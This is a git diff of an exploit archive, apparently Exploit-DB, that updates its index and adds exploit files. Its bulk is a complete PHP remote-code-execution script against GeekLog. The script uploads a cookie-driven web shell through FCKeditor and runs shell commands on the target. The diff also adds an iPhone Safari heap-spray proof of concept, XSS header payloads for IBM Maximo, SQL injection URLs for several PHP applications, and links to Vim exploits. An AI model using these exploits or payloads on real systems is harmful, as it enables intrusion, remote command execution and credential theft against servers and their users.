diff --git a/files.csv b/files.csv
index 8172651ec..ffdf28988 100755
--- a/files.csv
+++ b/files.csv
@@ -1671,7 +1671,7 @@ id,file,description,date,author,platform,type,port
 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection Vulnerability",2006-06-28,KeyCoder,php,webapps,0
 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
-1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
+1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
 1965,platforms/windows/remote/1965.pm,"MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
 1967,platforms/windows/dos/1967.c,"MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
 1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
@@ -28527,6 +28527,7 @@ id,file,description,date,author,platform,type,port
 31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL php/index.php nom_branche - Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
 31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL php/info.php - Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
 31733,platforms/hardware/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,hardware,webapps,50496
+31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80
 31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 (index.php, cID param) - SQL Injection",2014-02-18,killall-9,php,webapps,80
 31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80
 31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution",2014-02-18,metasploit,windows,remote,0
@@ -28699,6 +28700,7 @@ id,file,description,date,author,platform,type,port
 31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0
 31909,platforms/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0
 31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0
+31911,platforms/linux/local/31911.txt,"Vim 7.x - Vim Script Multiple Command Execution Vulnerabilities",2008-06-14,"Jan Minar",linux,local,0
 31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0
 31914,platforms/windows/dos/31914.pl,"GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0
 31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80
@@ -28756,6 +28758,7 @@ id,file,description,date,author,platform,type,port
 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting Vulnerability",2008-06-26,"Erez Metula",asp,webapps,0
 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service Vulnerability",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80
+31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 (get_all_created_by_user.php, id param) - SQL Injection",2014-02-28,HauntIT,php,webapps,80
 31972,platforms/windows/local/31972.py,"GoldMP4Player 3.3 - Buffer Overflow Exploit (SEH)",2014-02-28,metacom,windows,local,0
 31975,platforms/php/webapps/31975.txt,"The Rat CMS viewarticle.php Multiple Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0
 31976,platforms/php/webapps/31976.txt,"The Rat CMS viewarticle2.php id Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0
@@ -28772,6 +28775,7 @@ id,file,description,date,author,platform,type,port
 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80
 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
+31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0
 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
 31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
@@ -28815,3 +28819,14 @@ id,file,description,date,author,platform,type,port
 32034,platforms/php/webapps/32034.txt,"V-webmail 1.6.4 includes/cachedConfig.php CONFIG[pear_dir] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
 32035,platforms/php/webapps/32035.txt,"V-webmail 1.6.4 includes/prepend.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
 32036,platforms/php/webapps/32036.txt,"V-webmail 1.6.4 includes/email.list.search.php CONFIG[includes] Parameter Remote File Inclusion",2008-07-10,CraCkEr,php,webapps,0
+32037,platforms/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Stored XSS and SQL Injection Vulnerabilities",2014-03-03,LiquidWorm,php,webapps,0
+32038,platforms/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent XSS Vulnerability",2014-03-03,"Christian Catalano",php,webapps,0
+32039,platforms/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps,0
+32040,platforms/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary XSS File Upload",2014-03-03,"Christian Catalano",php,webapps,0
+32041,platforms/windows/local/32041.pl,"ALLPlayer 5.8.1 - (.m3u file) Buffer Overflow (SEH)",2014-03-03,"Gabor Seljan",windows,local,0
+32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 'register.php' Multiple Cross Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0
+32046,platforms/jsp/webapps/32046.txt,"IBM Maximo  4.1/ 5.2 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0
+32047,platforms/php/webapps/32047.txt,"Hudson 1.223 'q' Parameter Cross-Site Scripting Vulnerability",2008-07-11,syniack,php,webapps,0
+32048,platforms/osx/remote/32048.html,"Apple iPhone and iPod Touch Prior to Version 2.0 Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0
+32049,platforms/windows/remote/32049.txt,"Microsoft Internet Explorer 6.0 New ActiveX Object String Concatenation Memory Corruption Vulnerability",2008-07-14,0x000000,windows,remote,0
+32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - SEH Buffer Overflow",2014-03-04,"Daniel la calavera",windows,local,0
diff --git a/platforms/jsp/webapps/32046.txt b/platforms/jsp/webapps/32046.txt
new file mode 100755
index 000000000..c9197aafc
--- /dev/null
+++ b/platforms/jsp/webapps/32046.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/30180/info
+
+IBM Maximo is prone to multiple HTML-injection vulnerabilities and an information-disclosure vulnerability.
+
+An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Code execution may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Information obtained may aid in further attacks.
+
+These issues affect IBM Maximo 4.1 and 5.2; other versions may also be vulnerable. 
+
+GET /jsp/common/system/debug.jsp HTTP/1.1
+Accept: <script>alert('XSS');</script>
+Accept-Language: <script>alert('XSS');</script>
+UA-CPU: <script>alert('XSS');</script>
+Accept-Encoding: <script>alert('XSS');</script>
+User-Agent: <script>alert('XSS');</script>
+Host: maximo
+Connection: Keep-Alive
+Cookie: <script>alert('XSS');</script> 
\ No newline at end of file
diff --git a/platforms/linux/local/31911.txt b/platforms/linux/local/31911.txt
new file mode 100755
index 000000000..f37ad802b
--- /dev/null
+++ b/platforms/linux/local/31911.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29715/info
+
+Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Successfully exploiting these issues can allow an attacker to execute arbitrary commands with the privileges of the user running the affected application.
+
+Vim 7.1.298 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/31911-1.zip
+http://www.exploit-db.com/sploits/31911-2.zip
+http://www.exploit-db.com/sploits/31911-3.zip
diff --git a/platforms/osx/remote/32048.html b/platforms/osx/remote/32048.html
new file mode 100755
index 000000000..c8a6759f5
--- /dev/null
+++ b/platforms/osx/remote/32048.html
@@ -0,0 +1,74 @@
+source: http://www.securityfocus.com/bid/30186/info
+
+Apple iPhone and iPod touch are prone to multiple remote vulnerabilities:
+
+1. A vulnerability that may allow users to spoof websites.
+2. An information-disclosure vulnerability.
+3. A buffer-overflow vulnerability.
+4. Two memory-corruption vulnerabilities.
+
+Successfully exploiting these issues may allow attackers to execute arbitrary code, crash the affected application, obtain sensitive information, or direct unsuspecting victims to a spoofed site; other attacks are also possible.
+
+These issues affect iPhone 1.0 through 1.1.4 and iPod touch 1.1 through 1.1.4. 
+
+<BODY>
+        <SCRIPT src="HeapSpray2.js"></SCRIPT>
+        <CODE id="sploit status"></CODE>
+        <CODE id="heapspray status"></CODE>
+        <SCRIPT>
+                // The index for the "arguments" array in a JavaScript function in
+                // Safari suffers from a signedness issue that allows access to elements
+                // that are out of bounds. The index is cast to a signed value before it
+                // is compared to the length of the array to check if it within the
+                // bounds. Integer values larger than 0x8000,0000 will be cast to a
+                // negative value and because they are always smaller then the length,
+                // they are treated as a valid index.
+                // The index into the arguments array ends up in instructions
+                // that multiply it by 4 to access data in an array of 32 bit values.
+                // There are no checks for overflows in this calculation. This allows us
+                // to cause it to access anything in memory:
+                //     Pointer to object = base address + 4 * index
+                // The base address varies only slightly and is normally about
+                // 0x7FEx,xxxx. If we create a heap chunk of 0x0100,0000 bytes at a
+                // predictable location using heap spraying, we can then calculate an
+                // index that will access this memory.
+                var iBase = 0x7fe91e6c; // Random sample - value varies but not a lot.
+                var iTargetArea = 0x10000000;
+                // Be advised that heap spraying is "upside down" in Safari: strings
+                // are allocated at high addresses first and as the heap grows, the
+                // addresses go down. The heap will therefor grow in between a lot of
+                // DLLs which reside in this area of the address space as well.
+                // We&#039;ll need to find an area of memory to spray that is not likely to
+                // contain a DLL and easy to reach.
+                var iTargetAddress = 0x55555555;
+                //     iTargetAddress(~0x5555,5555) = iBase(~0x7FEx,xxxx) + 4 * iIndex
+                // 4 * iIndex = (iTargetAddress - iBase) (optionally + 0x1,0000,0000 because an integer overflow is needed)
+                var iRequiredMultiplicationResult = iTargetAddress - iBase + (iTargetAddress < iBase ? 0x100000000 : 0)
+                // iIndex = (iTargetAddress - iBase) / 4
+                var iIndex = Math.floor(iRequiredMultiplicationResult / 4)
+                // We need to trigger the signedness issue so the index must be larger
+                // then 0x8000,0000. Because of the integer overflow in the
+                // multiplication, we can safely add 0x4000,0000 as often as we want;
+                // the multiplication will remove it from the result.
+                while (iIndex < 0x80000000) iIndex += 0x40000000
+                document.getElementById("sploit status").innerHTML = (
+                        "iBase + 4 * iIndex = " +
+                        "0x" + iBase.toString(16, 8) + " + 4 * " + iIndex.toString(16, 8) + " = " +
+                        "0x" + (iBase + 4 * iIndex).toString(16, 8) + "<BR>"
+                );
+                // Set up heap spray
+                var oHeapSpray = new HeapSpray2(iTargetAddress, DWORD(0xDEADBEEF))
+                oHeapSpray.oOutputElement = document.getElementById("heapspray status")
+                // Spray heap asynchronously and call sploit when done.
+                oHeapSpray.spray(sploit)
+                function sploit(oHeapSpray) {
+                        // This will cause an access violation using the value 0xDEADBEEF,
+                        // which comes from the strings we sprayed the heap with.
+                        // 6aa3d57f 8b4f0c          mov     ecx,dword ptr [edi+0Ch] ds:0023:deadbefb=????????
+                        arguments[iIndex];
+                }
+                function DWORD(iValue) {
+                        return String.fromCharCode(iValue & 0xFFFF, iValue >> 16)
+                }
+        </SCRIPT>
+</BODY>
diff --git a/platforms/php/webapps/1964.php b/platforms/php/webapps/1964.php
index a628c48db..d6752c8f1 100755
--- a/platforms/php/webapps/1964.php
+++ b/platforms/php/webapps/1964.php
@@ -1,140 +1,140 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "Geeklog <= 1.4.0sr3 'f(u)ckeditor' remote commands execution\n";
-echo "by rgod rgod@autistici.org\n";
-echo "site: http://retrogod.altervista.org\n";
-
-//works regardless of any php.ini settings,
-//fckeditor (very old 'mcpuk' version...) is enabled by default,
-//and connector.php not protected,
-//you can upload multiple extensions files...
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
-echo "host:      target server (ip/hostname)\n";
-echo "path:      path to geeklog\n";
-echo "cmd:       a shell command\n";
-echo "Options:\n";
-echo "   -p[port]:    specify a port other than 80\n";
-echo "   -P[ip:port]: specify a proxy\n";
-echo "Example:\n";
-echo "php ".$argv[0]." localhost / cat ./../../../../config.php\n";
-die;
-}
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$port=80;
-$proxy="";
-$cmd="";
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
-$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
-$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
-$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
-for ($i=0; $i<=count($allowed_extensions)-1; $i++){
-$filename="suntzu.php.".$allowed_extensions[$i];
-$data="-----------------------------7d529a1d23092a\r\n";
-$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
-$data.="Content-Type:\r\n\r\n";
-$data.="$shell\r\n";
-$data.="-----------------------------7d529a1d23092a--\r\n";
-$packet="POST ".$p."fckeditor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?Command=FileUpload&Type=File HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-sleep(1);
-$packet="GET ".$p."images/library/File/".$filename." HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (eregi("Hi Master!",$html)){
-echo"Exploit succeeded...!\n";
-$temp=explode("*delim*",$html);
-die($temp[1]);}
-}
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-06-29]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "Geeklog <= 1.4.0sr3 'f(u)ckeditor' remote commands execution\n";
+echo "by rgod rgod@autistici.org\n";
+echo "site: http://retrogod.altervista.org\n";
+
+//works regardless of any php.ini settings,
+//fckeditor (very old 'mcpuk' version...) is enabled by default,
+//and connector.php not protected,
+//you can upload multiple extensions files...
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
+echo "host:      target server (ip/hostname)\n";
+echo "path:      path to geeklog\n";
+echo "cmd:       a shell command\n";
+echo "Options:\n";
+echo "   -p[port]:    specify a port other than 80\n";
+echo "   -P[ip:port]: specify a proxy\n";
+echo "Example:\n";
+echo "php ".$argv[0]." localhost / cat ./../../../../config.php\n";
+die;
+}
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$port=80;
+$proxy="";
+$cmd="";
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
+$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
+$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
+$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
+for ($i=0; $i<=count($allowed_extensions)-1; $i++){
+$filename="suntzu.php.".$allowed_extensions[$i];
+$data="-----------------------------7d529a1d23092a\r\n";
+$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
+$data.="Content-Type:\r\n\r\n";
+$data.="$shell\r\n";
+$data.="-----------------------------7d529a1d23092a--\r\n";
+$packet="POST ".$p."fckeditor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?Command=FileUpload&Type=File HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+sleep(1);
+$packet="GET ".$p."images/library/File/".$filename." HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (eregi("Hi Master!",$html)){
+echo"Exploit succeeded...!\n";
+$temp=explode("*delim*",$html);
+die($temp[1]);}
+}
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-06-29]
diff --git a/platforms/php/webapps/31734.txt b/platforms/php/webapps/31734.txt
new file mode 100755
index 000000000..9d3df2636
--- /dev/null
+++ b/platforms/php/webapps/31734.txt
@@ -0,0 +1,34 @@
+############################################################################
+# Title: Pina CMS SQL Injection and XSS Vulnerabilities 
+# Vendor: www.pinacms.com
+# Vendor Notified: 15-02-2014
+# Vendor Replied: 16-02-2014
+# Release in Public: 18-02-2014
+# Tested on: Windows/Linux
+# Author/Found by: Shadman Tanjim 
+# Website: www.secupent.com and www.vulnerability.io
+# Email: service@secupent.com or shadman2600@gmail.com
+# Twitter: twitter.com/secupent
+# Facebook: fb.me/secupent
+############################################################################
+
+1. Vulnerability no 1 (SQL Injection):
+
+http://target.com/page.php?action=post.manage.home&blog_id=1%27%22  
+
+Demo screenshot: https://www.dropbox.com/s/cpxvk7h1dxu8xnv/pina2.png
+
+2. Vulnerability no 2. (XSS):
+
+Go to this link: http://demo.pinacms.com/page.php?action=post.manage.home 
+
+Apply this JavaScript on search bar
+
+ "/><script>alert(574127);</script>
+ 
+Demo screenshot: https://www.dropbox.com/s/8jc51blyepypfas/pina1.png
+
+
+
+
+Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters..... 
diff --git a/platforms/php/webapps/31971.txt b/platforms/php/webapps/31971.txt
new file mode 100755
index 000000000..7d8b9903c
--- /dev/null
+++ b/platforms/php/webapps/31971.txt
@@ -0,0 +1,22 @@
+# ==============================================================
+# Title ...| PHP Ticket System SQL Injection
+# Version .| BETA_1.zip
+# Date ....| 27.02.2014
+# Found ...| HauntIT Blog
+# Home ....| http://sourceforge.net/projects/phpticketsystem/
+# ==============================================================
+
+ 
+# ==============================================================
+# SQL Injection
+
+---<request>---
+GET /k/cms/beta/mods/tickets/data/get_all_created_by_user.php?id='mynameissqli&sort%5B0%5D%5Bfield%5D=undefined&sort%5B0%5D%5Bdir%5D=desc HTTP/1.1
+Host: 10.149.14.62
+---<request>---
+
+
+# ==============================================================
+# More @ http://HauntIT.blogspot.com
+# Thanks! ;)
+# o/ 
\ No newline at end of file
diff --git a/platforms/php/webapps/32037.txt b/platforms/php/webapps/32037.txt
new file mode 100755
index 000000000..3cef2ebb7
--- /dev/null
+++ b/platforms/php/webapps/32037.txt
@@ -0,0 +1,128 @@
+couponPHP CMS 1.0 Multiple Stored XSS and SQL Injection Vulnerabilities
+
+
+Vendor: couponPHP
+Product web page: http://www.couponphp.com
+Affected version: 1.0
+
+Summary: couponPHP is a revolutionary content management system
+for running Coupon and Deal websites. It is feature rich, powerful,
+beautifully designed and fully automatic.
+
+Desc: couponPHP is vulnerable to multiple Stored XSS and SQL Injection issues.
+Input passed via the parameters 'iDisplayLength' and 'iDisplayStart' in
+'comments_paginate.php' and 'stores_paginate.php' scripts are not properly
+sanitised before being returned to the user or used in SQL queries. This can
+be exploited to manipulate SQL queries by injecting arbitrary SQL code.
+
+The parameter 'sEcho' in 'comments_paginate.php' and 'stores_paginate.php' and the
+parameters 'affiliate_url', 'description', 'domain', 'seo[description]', 'seo[heading]',
+'seo[title]', 'seo[keywords]', 'setting[logo]', 'setting[perpage]' and 'setting[sitename]'
+in '/admin/index.php' script are vulnerable to stored XSS issues where the attacker
+can execute arbitrary HTML and script code in a user's browser session in context
+of an affected site.
+
+
+Tested on: Apache/2.2.14(Ubuntu)
+           PHP/5.3.2-1ubuntu4.14
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+                              @zeroscience
+
+
+Advisory ID: ZSL-2014-5170
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5170.php
+
+
+01.02.2014
+
+--
+
+
+SQL Injections:
+----------------
+
+http://localhost/admin/ajax/comments_paginate.php?sEcho=1&iColumns=7&sColumns=&iDisplayStart=0[SQL Inject]&iDisplayLength=250[SQL Inject]
+http://localhost/admin/ajax/stores_paginate.php?sEcho=1&iColumns=12&sColumns=&iDisplayStart=0[SQL Inject]&iDisplayLength=250[SQL Inject]
+
+
+Full Request/Response Sample:
+------------------------------
+
+GET /admin/ajax/stores_paginate.php?sEcho=1&iColumns=12&sColumns=&iDisplayStart=0&iDisplayLength=250'&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&mDataProp_8=8&mDataProp_9=9&mDataProp_10=10&mDataProp_11=11&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&sSearch_8=&bRegex_8=false&bSearchable_8=true&sSearch_9=&bRegex_9=false&bSearchable_9=true&sSearch_10=&bRegex_10=false&bSearchable_10=true&sSearch_11=&bRegex_11=false&bSearchable_11=true&iSortingCols=0&bSortable_0=false&bSortable_1=false&bSortable_2=true&bSortable_3=true&bSortable_4=false&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&bSortable_10=false&bSortable_11=false HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Referer: http://localhost/admin/index.php?menu=stores_manage
+Cookie: [removed]
+Connection: keep-alive
+
+
+HTTP/1.1 200 OK
+Date: Sun, 02 Feb 2014 17:27:42 GMT
+Server: Apache/2.2.14 (Ubuntu)
+X-Powered-By: PHP/5.3.2-1ubuntu4.14
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 153
+Keep-Alive: timeout=15, max=100
+Connection: Keep-Alive
